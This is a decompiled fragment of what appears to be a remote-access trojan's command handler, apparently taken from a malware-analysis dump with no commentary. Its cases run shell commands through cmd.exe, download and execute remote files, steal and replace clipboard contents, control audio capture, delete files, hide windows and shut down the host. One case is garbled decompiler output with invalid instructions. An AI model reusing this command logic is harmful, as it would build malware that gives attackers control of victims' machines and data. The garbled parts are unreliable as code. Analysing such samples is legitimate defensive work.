                    						L131();
                    						_v348 = E00436769(_t237, E00401F95(E00401E49( &_v420, _t360, __eflags, 2)));
                    						_v344 =  &_v120;
                    						E004139B3(__ebx, _t360, 0x46c238, __eflags,  &_v348);
                    						_t120 = E0040805A() - 1; // -1
                    						_t378 = _t120;
                    						_t244 = E00401E49( &_v428, _t360, __eflags, 3);
                    						_t394 = _t390 - 0x18;
                    						E004020EC(_t294, _t394, _t360, __eflags, _t244);
                    						_t246 = E00401E49( &_v436, _t360, __eflags, 2);
                    						E004020EC(_t294, _t394 - 0x18, _t360, __eflags, _t246);
                    						E0040427F(_t294, _t394, E00401F95(E00401E49( &_v444, _t360, __eflags, 1)));
                    						E0040427F(_t294, _t394 - 0xffffffffffffffe8, E00401F95(E00401E49( &_v452, _t360, __eflags, 0)));
                    						E004077EC( &_v156, _t360, __eflags);
                    						__eflags = _v252;
                    						if(_v252 == 0) {
                    							E00408007( &_v420,  *((intOrPtr*)(E00407FE6(E0040806E( &_v156,  &_v504),  &_v500, _t378))));
                    						}
                    						E00407FDE(_t294,  &_v212, _t378);
                    						goto L126;
                    					} else {
                    						_t379 = _t375 - 1;
                    						if(_t379 > 0x33) {
                    							L126:
                    							_t163 =  &_v420; // 0x404538
                    							E00401E74(_t163, _t360);
                    							E00401FC7();
                    							E00401FC7();
                    							return 0;
                    						} else {
                    							switch( *((intOrPtr*)(_t379 * 4 +  &M004133F5))) {
                    								case 0:
                    									_t263 = E00417226(0,  &_v368, GetTickCount());
                    									_t265 = E00417226(0,  &_v336, E004171D6( &_v368));
                    									_t266 = E0041719C( &_v140); // executed
                    									_t267 = E0041739C(0,  &_v164, _t266);
                    									_t369 = E00402F93(0,  &_v404, E00402F1D( &_v264, E00402F93(0,  &_v240, E00402F1D( &_v216, E00402FB7( &_v192, E00401E49( &_v420, _t266, _t401, 0), 0x46c238), _t267), _t401, 0x46c238), _t265), _t401, 0x46c238);
                    									E00402F1D(_t390 - 0x18, _t273, _t263);
                    									_push(0x4c);
                    									E00404AA4(0, 0x46c780, _t273, _t401); // executed
                    									E00401FC7();
                    									E00401FC7();
                    									E00401FC7();
                    									E00401FC7();
                    									E00401FC7();
                    									E00401FC7();
                    									E00401EF0();
                    									E00401FC7();
                    									E00401FC7();
                    									_t287 = E00436769(_t285, E00401F95(E00401E49( &_v452, _t273, _t401, 1)));
                    									if(_t287 == 0) {
                    										E00401E49( &_v440, _t369, __eflags, 0);
                    										_t360 = "0";
                    										_t289 = E00405A6F("0");
                    										__eflags = _t289;
                    										if(_t289 != 0) {
                    											_push(0);
                    											_t358 = 0x46c780;
                    											goto L10;
                    										}
                    									} else {
                    										_t360 = _t287 + _t287;
                    										if(E0040484A(0x46c780) == 0) {
                    											E00404E9A(0x46c780, _t360, 1);
                    										} else {
                    											E00404FAD(0x46c238, _t360);
                    										}
                    									}
                    									goto L126;
                    								case 1:
                    									_push(0);
                    									__ecx = 0x46c780;
                    									L10:
                    									E0040511B(_t358, 0x46c238);
                    									goto L126;
                    								case 2:
                    									__ecx =  &_v368;
                    									__eax = E00417C05(__ebx,  &_v368);
                    									__esp = __esp - 0x18;
                    									__edx = __eax;
                    									__ecx = __esp;
                    									__eax = E0041739C(__ebx, __esp, __edx);
                    									_push(0x33);
                    									__ecx = 0x46c780;
                    									__eax = E00404AA4(__ebx, 0x46c780, __edx, __eflags);
                    									__ecx =  &_v396;
                    									goto L107;
                    								case 3:
                    									goto L126;
                    								case 4:
                    									 &_v376 = GetCurrentProcessId();
                    									__eax = E0043BACE(__ecx, __eax,  &_v376, 0xa);
                    									__esp = __esp - 0xc;
                    									__eax =  &_v376;
                    									__esi = __esp;
                    									__ecx =  &_v336;
                    									__edx = E0040D211(__ebx,  &_v336, __eflags);
                    									__ecx =  &_v368;
                    									__edx = __eax;
                    									__ecx = __esi;
                    									__eax = E00405343(__ebx, __esi, __edx, __edi, __eflags,  &_v376);
                    									_push(0x4f);
                    									L125:
                    									__ecx = 0x46c780;
                    									__eax = E00404AA4(__ebx, 0x46c780, __edx, __eflags);
                    									__ecx =  &_v396;
                    									__eax = E00401FC7();
                    									__ecx =  &_v364;
                    									__eax = E00401FC7();
                    									goto L126;
                    								case 5:
                    									__ecx =  &_v420;
                    									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
                    									__eax = E00401F95(__ecx);
                    									__ecx = __eax;
                    									__eax = E004171F9(__ecx);
                    									goto L126;
                    								case 6:
                    									L20:
                    									__eax = E00413909(__edx);
                    									goto L126;
                    								case 7:
                    									__ecx =  &_v420;
                    									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
                    									__eax = E00401F95(__ecx);
                    									__eax = CloseWindow(__eax);
                    									goto L126;
                    								case 8:
                    									_push(3);
                    									goto L16;
                    								case 9:
                    									_push(9);
                    									L16:
                    									_push(0);
                    									L17:
                    									__ecx =  &_v420;
                    									__ecx = E00401E49( &_v420, __edx, __eflags);
                    									__eax = E00401F95(__ecx);
                    									__eax = ShowWindow(__eax, ??);
                    									goto L126;
                    								case 0xa:
                    									__eax =  &_v372;
                    									__ecx =  &_v420;
                    									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
                    									__eax = E00401F95(__ecx);
                    									__eax = GetWindowThreadProcessId(__eax,  &_v372);
                    									__ecx = _v376;
                    									__eax = E004171F9(_v376);
                    									goto L20;
                    								case 0xb:
                    									__ebx = 0;
                    									__ecx =  &_v420;
                    									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
                    									__eax = E00401F95(__eax);
                    									__ecx =  &_v340;
                    									__eax = E0040427F(0,  &_v340, __eax);
                    									__edx = L"/C ";
                    									__ecx =  &_v376;
                    									__ecx = __eax;
                    									__eax = ShellExecuteW(0, L"open", L"cmd.exe", __eax, 0, 0);
                    									__ecx =  &_v376;
                    									__eax = E00401EF0();
                    									__ecx =  &_v344;
                    									goto L107;
                    								case 0xc:
                    									__ecx =  &_v420;
                    									__eax = E00401E49( &_v420, __edx, __eflags, 1);
                    									__ecx = 0x46c2d0;
                    									__eax = E00401FAD(0x46c2d0, __eax);
                    									__eflags =  *0x46bae3 - __bl;
                    									if(__eflags == 0) {
                    										__ecx =  &_v420;
                    										__eax = E00401E49( &_v420, __edx, __eflags, 0);
                    										__esp = __esp - 0x18;
                    										__ecx = __esp;
                    										__eax = E004055EA();
                    										goto L103;
                    									}
                    									goto L126;
                    								case 0xd:
                    									__ebx = 0;
                    									__ecx =  &_v420;
                    									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
                    									E00401F95(__ecx) = ShellExecuteW(0, L"open", __eax, 0, 0, 1);
                    									goto L126;
                    								case 0xe:
                    									__ecx =  &_v420;
                    									__eax = E00401E49( &_v420, __edx, __eflags, 0);
                    									__ecx = 0x46c868;
                    									__eax = E00401FAD(0x46c868, __eax);
                    									__ecx =  &_v428;
                    									__ecx = E00401E49( &_v428, __edx, __eflags, 3);
                    									__eax = E00401F95(__ecx);
                    									__esi = __eax;
                    									__eax = E0041451F(__edx, __edi, __eax);
                    									__ecx =  &_v432;
                    									__ecx = E00401E49( &_v432, __edx, __eflags, 2);
                    									__eax = E00401F95(__ecx);
                    									__eax = E00436769(__ecx, __eax);
                    									__eflags = __eax;
                    									__ecx =  &_v436;
                    									_t57 = __eax != 0;
                    									__eflags = _t57;
                    									__ebx = 0 | _t57;
                    									__ecx = E00401E49( &_v436, __edx, _t57, 1);
                    									E00401F95(__ecx) = E00436769(__ecx, __eax);
                    									__dl = __bl;
                    									__cl = __al;
                    									__eax = E0041459C(__ecx, __edx, __eflags, __esi);
                    									goto L26;
                    								case 0xf:
                    									 *0x46bd6a = 1;
                    									__eax = __eax + 0x46bd6a;
                    									__ecx = __ecx + __ebp;
                    									asm("wait");
                    									__eax = __eax |  *__eax;
                    									 *__edx =  *__edx + __ch;
                    									__eflags =  *__edx;
                    									goto L126;
                    								case 0x10:
                    									__ecx =  &_v420;
                    									__eax = E00401E49( &_v420, __edx, __eflags, 0);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
                    									__ecx = 0x46c350;
                    									__eax = E0040857D(0x46c350, __edx);
                    									goto L126;
                    								case 0x11:
                    									__ecx = 0x46c350;
                    									__eax = E004093AD(0x46c350);
                    									goto L126;
                    								case 0x12:
                    									__ecx = 0x46c350;
                    									__eax = E0040951E(__ebx, 0x46c350);
                    									goto L126;
                    								case 0x13:
                    									__ecx =  &_v420;
                    									__eax = E00401E49( &_v420, __edx, __eflags, 0);
                    									__ecx = 0x46c3e0;
                    									__eax = E00401FAD(0x46c3e0, __eax);
                    									__ecx = 0x46c350;
                    									goto L33;
                    								case 0x14:
                    									 *0x46bd6c =  *0x46bd6c + 1;
                    									__eflags =  *0x46bd6c;
                    									__eflags = __eax;
                    									__ecx =  &_v420;
                    									__eax = E00401E49( &_v420, __edx, __eflags, 0);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
                    									__ecx = 0x46c350;
                    									__eax = E00408FF0(0x46c350, __edx);
                    									goto L36;
                    								case 0x15:
                    									__esi = 0x46c350;
                    									__ecx = 0x46c350;
                    									__eax = E00409D36(0x46c350);
                    									__ecx = 0x46c350;
                    									L33:
                    									__eax = E00408E9E(__ebx, __ecx);
                    									goto L126;
                    								case 0x16:
                    									__eflags =  *0x46baf9 - __bl;
                    									asm("sbb eax, 0x46baf9");
                    									if(__eflags == 0) {
                    										__edx = 0;
                    										__cl = 0;
                    										__eax = E0040A679(0);
                    									}
                    									goto L126;
                    								case 0x17:
                    									__ebx = 0;
                    									__ecx =  &_v420;
                    									__eax = E00401E49( &_v420, __edx, __eflags, 0);
                    									__ecx = 0x46c1b8;
                    									__eax = E00401FAD(0x46c1b8, __eax);
                    									__ecx = 0x46c1d0;
                    									__eax = E0040498B(0x46c1d0);
                    									__esp = __esp - 0x10;
                    									__esi = 0x46bacc;
                    									__edi = __esp;
                    									asm("movsd");
                    									asm("movsd");
                    									asm("movsd");
                    									asm("movsd");
                    									__esi = 0x46c1d0;
                    									__ecx = 0x46c1d0;
                    									__eax = E00404A08(__edx);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									_push(0x46c1b8);
                    									__eflags =  *0x46baaa - __bl; // 0x0
                    									if(__eflags == 0) {
                    										__eax = E004020EC(0, __ecx, __edx, __eflags);
                    									} else {
                    										__eax = E004020EC(0, __ecx, __edx, __eflags);
                    									}
                    									__ecx = __esi;
                    									__eax = E00404AA4(__ebx, __esi, __edx, __eflags);
                    									__ecx = __esi;
                    									__eax = E00404BBE(__ecx, __edx, 0x404538, __ebx);
                    									goto L126;
                    								case 0x18:
                    									__eax =  *0x46bac0();
                    									__ecx = 0x46c1d0;
                    									__eax = E00404E0B(0x46c1d0);
                    									goto L126;
                    								case 0x19:
                    									__ebx = 0;
                    									__ecx =  &_v420;
                    									 *0x46ba74 = __bl;
                    									__eax = E00401E49( &_v420, __edx, __eflags, 3);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E004020EC(0, __esp, __edx, __eflags, __eax);
                    									__ecx =  &_v428;
                    									__ecx = E00401E49( &_v428, __edx, __eflags, 2);
                    									__eax = E00401F95(__ecx);
                    									_push(__eax);
                    									__ecx =  &_v432;
                    									__ecx = E00401E49( &_v432, __edx, __eflags, 1);
                    									__eax = E00401F95(__ecx);
                    									__eax = E00436769(__ecx, __eax);
                    									__ecx =  &_v436;
                    									__esi = __eax;
                    									__ecx = E00401E49( &_v436, __edx, __eflags, 0);
                    									__eax = E00401F95(__ecx);
                    									__eax = E00436769(__ecx, __eax);
                    									__edx = __esi;
                    									__ecx = __eax;
                    									__eax = E004016F8(__ecx, __edx, __edi, __esi);
                    									goto L126;
                    								case 0x1a:
                    									_push( *0x46bab8);
                    									__eax = __eax ^ 0x0046bab8;
                    									 *0x46ba74 = 1;
                    									waveInStop(??) = waveInClose( *0x46bab8);
                    									goto L126;
                    								case 0x1b:
                    									 *0x46bd6c =  *0x46bd6c + 1;
                    									__eflags =  *0x46bd6c;
                    									__eax = 0x46bd6c + __eax;
                    									__ecx =  &_v420;
                    									__eax = E00401E49( &_v420, __edx, __eflags, 1);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
                    									__ecx =  &_v428;
                    									__eax = E00401E49( &_v428, __edx, __eflags, 0);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E00410188(__edx);
                    									__esp = __esp + 0x30;
                    									L36:
                    									 *0x46bd6c =  *0x46bd6c - 1;
                    									goto L126;
                    								case 0x1c:
                    									__ecx =  &_v420;
                    									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
                    									E00401F95(__ecx) = DeleteFileW(__eax);
                    									goto L126;
                    								case 0x1d:
                    									__eax = E0041015B();
                    									ExitProcess(0);
                    								case 0x1e:
                    									while(1) {
                    										__eflags =  *0x46bd6c - __ebx;
                    										if( *0x46bd6c == __ebx) {
                    											break;
                    										}
                    										Sleep(0x64);
                    									}
                    									__al = __al + __ch;
                    									__eflags = __al;
                    									E0040AD84();
                    									_pop(__ebx);
                    									__al = __al & 0x00000041;
                    									__cl = __cl + __ah;
                    									__eax = __eax & 0x2f500041;
                    									__ecx = __ecx + 1;
                    									__ah = __ah + __al;
                    									__eax = __eax ^  *__ecx;
                    									asm("les esi, [ebx]");
                    									__ecx = __ecx + 1;
                    									__dl = __dl + __ch;
                    									__eax = __eax & 0x262e0041;
                    									__ecx = __ecx + 1;
                    									__cl = __cl + __dl;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__ebx + 0x26)) =  *((intOrPtr*)(__ebx + 0x26)) + __dl;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__eax + 0x26)) =  *((intOrPtr*)(__eax + 0x26)) + __bh;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__edi - 0x5cffbeda)) =  *((intOrPtr*)(__edi - 0x5cffbeda)) + __bl;
                    									__ecx = __ecx + 1;
                    									__bl = __bl + __bl;
                    									__ecx = __ecx + 1;
                    									 *0x77004127 =  *0x77004127 + __dh;
                    									asm("daa");
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__eax + 0x1d004127)) =  *((intOrPtr*)(__eax + 0x1d004127)) + __ah;
                    									 *__ecx =  *__ecx - __al;
                    									 *__eax =  *__eax - __ebp;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__esi + 0x28)) =  *((intOrPtr*)(__esi + 0x28)) + __cl;
                    									__ecx = __ecx + 1;
                    									_a36 = _a36 + __bl;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__eax +  &_a61)) =  *((intOrPtr*)(__eax +  &_a61)) + __ch;
                    									 *((intOrPtr*)(__ecx - 0x3dffbed8)) =  *((intOrPtr*)(__ecx - 0x3dffbed8)) + __dl;
                    									 *__ecx =  *__ecx - __al;
                    									0x4133();
                    									__ah = __ah + __al;
                    									__eax = __eax ^  *__ecx;
                    									 *__eax =  *__eax >> __cl;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__eax + 0x29)) =  *((intOrPtr*)(__eax + 0x29)) + __cl;
                    									__ecx = __ecx + 1;
                    									_a37 = _a37 + __bl;
                    									__ecx = __ecx + 1;
                    									__cl = __cl + __bl;
                    									 *__ecx =  *__ecx - __eax;
                    									asm("std");
                    									 *__ecx =  *__ecx - __eax;
                    									__eflags = __al - 0x2a;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__edx + 0x2a)) =  *((intOrPtr*)(__edx + 0x2a)) + __bl;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__edi + 0x2a)) =  *((intOrPtr*)(__edi + 0x2a)) + __ch;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__edx +  &_a61)) =  *((intOrPtr*)(__edx +  &_a61)) + __bh;
                    									 *((intOrPtr*)(__esi + 0x1c00412a)) =  *((intOrPtr*)(__esi + 0x1c00412a)) + __cl;
                    									__eax = __eax -  *__ecx;
                    									asm("invalid");
                    									__ecx = __ecx + 1;
                    									__cl = __cl + __ah;
                    									__eax = __eax -  *__ecx;
                    									 *0x2cee0041 = __ch;
                    									__ecx = __ecx + 1;
                    									_a41 = _a41 + __ch;
                    									__ecx = __ecx + 1;
                    									__dl = __dl + __ch;
                    									__eax = __eax - 0x2e1e0041;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__esi + 0x2e)) =  *((intOrPtr*)(__esi + 0x2e)) + __ch;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__eax + 0x2e)) =  *((intOrPtr*)(__eax + 0x2e)) + __bh;
                    									__ecx = __ecx + 1;
                    									 *((intOrPtr*)(__eax - 0x47ffbed2)) =  *((intOrPtr*)(__eax - 0x47ffbed2)) + __bl;
                    									__ecx = __ecx + 1;
                    									__al = __al + __bl;
                    									__ecx = __ecx + 1;
                    									 *__eax =  *__eax + __dh;
                    									asm("das");
                    									__ecx = __ecx + 1;
                    									__ah = __ah + __al;
                    									__eax = __eax ^  *__ecx;
                    									__eflags = __eax;
                    									if(__eax == 0) {
                    										__ecx = __ecx + 1;
                    										__ch = __ch + __ch;
                    										 *__ecx =  *__ecx ^ __al;
                    										asm("adc dh, [ecx]");
                    										__ecx = __ecx + 1;
                    										 *__edx =  *__edx + __dl;
                    										__al = __al ^  *__ecx;
                    										__dh =  *__edx;
                    										__ecx = __ecx + 1;
                    										 *((intOrPtr*)(__edx - 0x35ffbece)) =  *((intOrPtr*)(__edx - 0x35ffbece)) + __ch;
                    										 *__ecx =  *__ecx ^ __al;
                    										__edx = __edx - 1;
                    										__al = __al ^  *__ecx;
                    										_push(0x32);
                    										__ecx = __ecx + 1;
                    										 *((intOrPtr*)(__eax + 0x33)) =  *((intOrPtr*)(__eax + 0x33)) + __dl;
                    										__ecx = __ecx + 1;
                    										 *((intOrPtr*)(__edi + 0x33)) =  *((intOrPtr*)(__edi + 0x33)) + __dl;
                    										__ecx = __ecx + 1;
                    										 *((intOrPtr*)(__esi + 0x33)) =  *((intOrPtr*)(__esi + 0x33)) + __bl;
                    										__ecx = __ecx + 1;
                    										 *__ecx =  *__ecx + __ah;
                    										__eflags =  *__ecx;
                    									}
                    									__eax = __eax ^  *__ecx;
                    									asm("retf 0x4132");
                    									_a47 = _a47 + __ah;
                    									__ecx = __ecx + 1;
                    									__ah = __ah + __dl;
                    									__al = __al ^  *__ecx;
                    									__dh = __dh +  *__edx;
                    									__ecx = __ecx + 1;
                    									 *__ecx =  *__ecx + __cl;
                    									__al = __al ^  *__ecx;
                    									_t216 = __eax;
                    									__eax = __edi;
                    									__edi = _t216;
                    									 *__ecx =  *__ecx ^ __eax;
                    									asm("les esi, [ebx]");
                    									__ecx = __ecx + 1;
                    									 *__eax =  *__eax + __al;
                    									__eflags =  *__eax;
                    									asm("adc al, [ecx]");
                    									asm("adc al, [edx]");
                    									__edx = __edx +  *__edx;
                    									__al = __al + 5;
                    									_push(es);
                    									_pop(es);
                    									asm("adc dl, [edx]");
                    									asm("adc cl, [eax]");
                    									 *__edx =  *__edx | __ecx;
                    									asm("adc cl, [ebx]");
                    									__al = __al | 0x00000012;
                    									asm("adc dl, [edx]");
                    									asm("adc dl, [edx]");
                    									asm("adc dl, [edx]");
                    									__eax = __eax | 0x12100f0e;
                    									asm("adc dl, [edx]");
                    									asm("adc [esi-0x75], edx");
                    									_push(__esi);
                    									__esi = __ecx;
                    									__ecx = __esi + 4;
                    									E0040484E(__ebx, __esi + 4, 0) = __esi;
                    									_pop(__esi);
                    									return __esi;
                    									goto L132;
                    								case 0x1f:
                    									__eax = E0040B488(__ebx, __eflags);
                    									goto L126;
                    								case 0x20:
                    									while(1) {
                    										__eflags =  *0x46bd6c - __ebx; // 0x0
                    										if(__eflags == 0) {
                    											break;
                    										}
                    										Sleep(0x64);
                    									}
                    									__ebx = 0;
                    									__ecx =  &_v420;
                    									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
                    									__eax = E00401F95(__eax);
                    									__ecx =  &_v424;
                    									__esi = __eax;
                    									__ecx = E00401E49( &_v424, __edx, __eflags, 1);
                    									__eax = E00401F95(__eax);
                    									__dl =  *__esi;
                    									__ecx =  &_v408;
                    									__eax = E0041805B( &_v408, __edx, __eax);
                    									_push(0);
                    									_push(0);
                    									__ecx =  &_v408;
                    									_push(E00401EEB( &_v408));
                    									__ecx =  &_v428;
                    									__ecx = E00401E49( &_v428, __edx, __eflags, 2);
                    									__eax = E00401F95(__eax);
                    									_push(__eax);
                    									_push(0);
                    									__imp__URLDownloadToFileW();
                    									__eflags = __eax;
                    									if(__eflags == 0) {
                    										goto L58;
                    									}
                    									goto L106;
                    								case 0x21:
                    									while(1) {
                    										__eflags =  *0x46bd6c - __ebx; // 0x0
                    										if(__eflags == 0) {
                    											break;
                    										}
                    										Sleep(0x64);
                    									}
                    									__ecx =  &_v420;
                    									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
                    									__eax = E00401F95(__eax);
                    									__ecx =  &_v424;
                    									__esi = __eax;
                    									__ecx = E00401E49( &_v424, __edx, __eflags, 1);
                    									__eax = E00401F95(__eax);
                    									__dl =  *__esi;
                    									__ecx =  &_v408;
                    									__eax = E0041805B( &_v408, __edx, __eax);
                    									__ecx =  &_v408;
                    									__eax = E00401EEB( &_v408);
                    									__ecx =  &_v428;
                    									__esi = __eax;
                    									__eax = E00401E49( &_v428, __edx, __eflags, 2);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
                    									__ecx = __esi;
                    									__eax = E00417A4E(__esi);
                    									__esp = __esp + 0x18;
                    									__eflags = __al;
                    									if(__eflags != 0) {
                    										L58:
                    										__esp = __esp - 0x18;
                    										__eax =  &_v420;
                    										__ecx = __esp;
                    										E00407350(__ebx, __esp, __edx, __eflags,  &_v420) = E0040B0E2();
                    										__esp = __esp + 0x18;
                    									}
                    									goto L106;
                    								case 0x22:
                    									__ecx =  &_v420;
                    									__ecx = E00401E49( &_v420, __edx, __eflags, 2);
                    									__eax = E00401F95(__ecx);
                    									__eax = __eax + 0x10000;
                    									__ecx =  &_v424;
                    									__ecx = E00401E49( &_v424, __edx, __eflags, 1);
                    									__eax = E00401F95(__eax);
                    									__ebx = 0;
                    									__ecx =  &_v428;
                    									__ecx = E00401E49( &_v428, __edx, __eflags, 0);
                    									E00401F95(__ecx) = MessageBoxW(0, __eax, __eax, __eax);
                    									goto L126;
                    								case 0x23:
                    									__eax = E00413958();
                    									__ebx = 0;
                    									__ecx =  &_v420;
                    									__eax = E00401E49( &_v420, __edx, __eflags, 0);
                    									__edx = "0";
                    									__ecx = __eax;
                    									__eax = E00405A6F(__edx);
                    									__ecx =  &_v424;
                    									_push(0);
                    									__eflags = __al;
                    									if(__eflags == 0) {
                    										__eax = E00401E49( &_v424, __edx, __eflags);
                    										__edx = "1";
                    										__ecx = __eax;
                    										__eax = E00405A6F(__edx);
                    										__ecx =  &_v424;
                    										_push(0);
                    										__eflags = __al;
                    										if(__eflags == 0) {
                    											__eax = E00401E49( &_v424, __edx, __eflags);
                    											__edx = "2";
                    											__ecx = __eax;
                    											__eax = E00405A6F(__edx);
                    											__eflags = __al;
                    											if(__eflags == 0) {
                    												__eax = LoadLibraryA("PowrProf.dll");
                    												__eax = GetProcAddress(__eax, "SetSuspendState");
                    												__ecx =  &_v420;
                    												__esi = __eax;
                    												__eax = E00401E49( &_v420, __edx, __eflags, 0);
                    												__edx = "3";
                    												__ecx = __eax;
                    												__eax = E00405A6F(__edx);
                    												_push(0);
                    												__eflags = __al;
                    												if(__eflags == 0) {
                    													__ecx =  &_v420;
                    													__eax = E00401E49( &_v420, __edx, __eflags);
                    													__edx = "4";
                    													__ecx = __eax;
                    													__eax = E00405A6F(__edx);
                    													__eflags = __al;
                    													if(__al != 0) {
                    														_push(0);
                    														_push(0);
                    														_push(1);
                    														goto L75;
                    													}
                    												} else {
                    													_push(0);
                    													_push(0);
                    													L75:
                    													__eax =  *__esi();
                    												}
                    											} else {
                    												_push(0);
                    												__ecx =  &_v420;
                    												__ecx = E00401E49( &_v420, __edx, __eflags, 1);
                    												__eax = E00401F95(__ecx);
                    												__eax = E00436769(__ecx, __eax);
                    												__eax = __eax | 0x00000002;
                    												__eflags = __eax;
                    												goto L70;
                    											}
                    										} else {
                    											__ecx = E00401E49( &_v424, __edx, __eflags, 1);
                    											__eax = E00401F95(__ecx);
                    											__eax = E00436769(__ecx, __eax);
                    											__eax = __eax | 0x00000001;
                    											goto L70;
                    										}
                    									} else {
                    										__ecx = E00401E49( &_v424, __edx, __eflags, 1);
                    										__eax = E00401F95(__ecx);
                    										__eax = E00436769(__ecx, __eax);
                    										L70:
                    										_pop(__ecx);
                    										__eax = ExitWindowsEx(__eax, ??);
                    									}
                    									goto L126;
                    								case 0x24:
                    									L81:
                    									__eax = OpenClipboard(__ebx);
                    									__eflags = __eax;
                    									if(__eax != 0) {
                    										__esi = GetClipboardData(0xd);
                    										__edi = GlobalLock(__esi);
                    										GlobalUnlock(__esi) = CloseClipboard();
                    										__eflags = __edi;
                    										0x45f724 =  !=  ? __edi : 0x45f724;
                    										__ecx =  &_v400;
                    										__eax = E0040427F(__ebx,  &_v400,  !=  ? __edi : 0x45f724);
                    										__esp = __esp - 0x18;
                    										__edx =  &_v404;
                    										__ecx = __esp;
                    										__eax = E0041739C(__ebx, __esp, __edx);
                    										_push(0x6b);
                    										__ecx = 0x46c780;
                    										__eax = E00404AA4(__ebx, 0x46c780, __edx, __eflags);
                    										L106:
                    										__ecx =  &_v400;
                    										L107:
                    										__eax = E00401EF0();
                    									}
                    									goto L126;
                    								case 0x25:
                    									__eflags = OpenClipboard(0);
                    									if(__eflags != 0) {
                    										__eax = EmptyClipboard();
                    										__ecx =  &_v420;
                    										__ecx = E00401E49( &_v420, __edx, __eflags, 0);
                    										__eax = E00402489();
                    										__eax = __eax + 2;
                    										__edi = __eax;
                    										__eax = GlobalLock(__edi);
                    										__ecx =  &_v424;
                    										__esi = __eax;
                    										__ecx = E00401E49( &_v424, __edx, __eflags, 0);
                    										__eax = E00402489();
                    										__ecx =  &_v428;
                    										__ecx = E00401E49( &_v428, __edx, __eflags, 0);
                    										GlobalUnlock(__edi) = SetClipboardData(0xd, __edi);
                    										goto L80;
                    									}
                    									goto L126;
                    								case 0x26:
                    									__eax = OpenClipboard(0);
                    									__eflags = __eax;
                    									if(__eax != 0) {
                    										__eax = EmptyClipboard();
                    										L80:
                    										__eax = CloseClipboard();
                    										goto L81;
                    									}
                    									goto L126;
                    								case 0x27:
                    									__ebx = 0;
                    									__ecx =  &_v420;
                    									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
                    									__eax = E00402489();
                    									__ecx =  &_v424;
                    									__esi = __eax;
                    									__ecx = E00401E49( &_v424, __edx, __eflags, 0);
                    									__eax = E00401F95(__eax);
                    									__edx = __esi;
                    									__ecx = __eax;
                    									__eax = E0040F69B();
                    									goto L126;
                    								case 0x28:
                    									__eax =  &_v404;
                    									__ebx = 0;
                    									__ecx =  &_v420;
                    									_v404 = 0;
                    									_v408 = 0;
                    									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
                    									__eax = E00401F95(__eax);
                    									__edx =  &_v412;
                    									__ecx = __eax;
                    									__eax = E00417111(__eax, __edx,  &_v404);
                    									__eflags = __eax - 1;
                    									if(__eax == 1) {
                    										__edx = _v404;
                    										__ecx = _v408;
                    										E0040F69B() = L004394F1(_v408);
                    										L26:
                    										_pop(__ecx);
                    									}
                    									goto L126;
                    								case 0x29:
                    									__eax = E0040A732(__edx);
                    									goto L126;
                    								case 0x2a:
                    									__ecx =  &_v420;
                    									__eax = E00401E49( &_v420, __edx, __eflags, 0);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E00413CC0(__edx);
                    									goto L103;
                    								case 0x2b:
                    									__ecx =  &_v420;
                    									__eax = E00401E49( &_v420, __edx, __eflags, 0);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E004117F1(__edx);
                    									goto L103;
                    								case 0x2c:
                    									__ecx =  &_v420;
                    									__eax = E00401E49( &_v420, __edx, __eflags, 0);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E00405367(__edx);
                    									goto L103;
                    								case 0x2d:
                    									_push(__ecx);
                    									__esi = 0x46c560;
                    									__ecx = 0x46c560;
                    									__eax = E00402489();
                    									__ecx = 0x46c560;
                    									__eax = E00401F95(0x46c560);
                    									__ebx = 0;
                    									__ecx =  &_v420;
                    									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
                    									E00402489() = __eax + 1;
                    									__ecx =  &_v424;
                    									__ecx = E00401E49( &_v424, __edx, __eflags, 0);
                    									__eax = E00401F95(__eax);
                    									__ecx = 0x46c518;
                    									__edx = E00401F95(0x46c518);
                    									__eax = E00410C80(__edx, __eflags, "name", __eax, __eax, __eax, __eax);
                    									goto L103;
                    								case 0x2e:
                    									__ecx =  &_v420;
                    									__eax = E00401E49( &_v420, __edx, __eflags, 0);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E0040EE3B(__edx);
                    									goto L103;
                    								case 0x2f:
                    									__ecx =  &_v420;
                    									__eax = E00401E49( &_v420, __edx, __eflags, 0);
                    									__esp = __esp - 0x18;
                    									__ecx = __esp;
                    									__eax = E00415B9C(__edx);
                    									L103:
                    									goto L126;
                    							}
                    						}
                    					}
                    				}
                    				L132:
                    			}

